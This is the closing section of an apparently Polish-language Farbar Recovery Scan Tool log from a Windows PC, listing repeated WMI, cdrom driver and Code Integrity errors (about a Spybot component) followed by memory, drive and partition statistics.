Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (05/05/2017 02:13:25 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/05/2017 02:10:52 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/05/2017 01:19:14 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/05/2017 12:54:09 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/05/2017 09:22:32 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/05/2017 09:13:52 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/04/2017 05:04:58 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/04/2017 12:33:06 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/04/2017 11:41:54 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/04/2017 09:36:29 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Dziennik System: ============= Error: (05/05/2017 09:13:51 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/04/2017 05:04:28 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/04/2017 12:31:20 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/04/2017 11:40:19 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/04/2017 11:36:50 AM) (Source: Service Control Manager) (EventID: 7006) (User: ) Description: Wywołanie ScRegSetValueExW dla Type nie powiodło się i wystąpił następujący błąd: Odmowa dostępu. . Error: (05/04/2017 08:34:07 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/03/2017 10:10:05 AM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/02/2017 06:09:38 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (05/01/2017 09:03:04 PM) (Source: Service Control Manager) (EventID: 7026) (User: ) Description: Nie można załadować następujących sterowników startu rozruchowego lub systemowego: cdrom Error: (04/29/2017 11:02:58 PM) (Source: cdrom) (EventID: 15) (User: ) Description: Urządzenie \Device\CdRom0 nie jest jeszcze przygotowane do dostępu. CodeIntegrity: =================================== Date: 2017-05-03 11:53:02.126 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-05-03 11:53:02.110 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-05-03 11:53:02.110 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-05-03 11:53:02.095 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-29 10:45:10.119 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-29 10:45:10.108 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-29 10:45:10.098 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-29 10:45:10.088 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-27 17:16:15.024 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. Date: 2017-04-27 17:16:15.009 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i3-4160 CPU @ 3.60GHz Procent pamięci w użyciu: 66% Całkowita pamięć fizyczna: 3030.81 MB Dostępna pamięć fizyczna: 1004.54 MB Całkowita pamięć wirtualna: 6059.81 MB Dostępna pamięć wirtualna: 3753.25 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:117.28 GB) (Free:32.77 GB) NTFS Drive d: () (Fixed) (Total:97.65 GB) (Free:23.84 GB) NTFS Drive e: (Nowy) (Fixed) (Total:368.1 GB) (Free:29.31 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 117.4 GB) (Disk ID: 7512DF97) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=117.3 GB) - (Type=07 NTFS) ======================================================== Disk: 1 (Size: 465.8 GB) (Disk ID: 07830782) Partition 1: (Active) - (Size=97.7 GB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=368.1 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================